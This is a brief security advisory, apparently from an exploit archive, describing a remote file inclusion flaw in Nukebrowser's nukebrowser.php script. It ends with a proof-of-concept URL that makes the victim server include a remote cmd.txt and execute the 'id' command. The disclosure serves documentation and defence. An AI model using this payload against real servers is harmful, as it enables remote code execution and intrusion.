7 lines
No EOL
522 B
Text
7 lines
No EOL
522 B
Text
source: http://www.securityfocus.com/bid/6731/info
|
|
|
|
Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file.
|
|
|
|
Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.
|
|
|
|
http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id |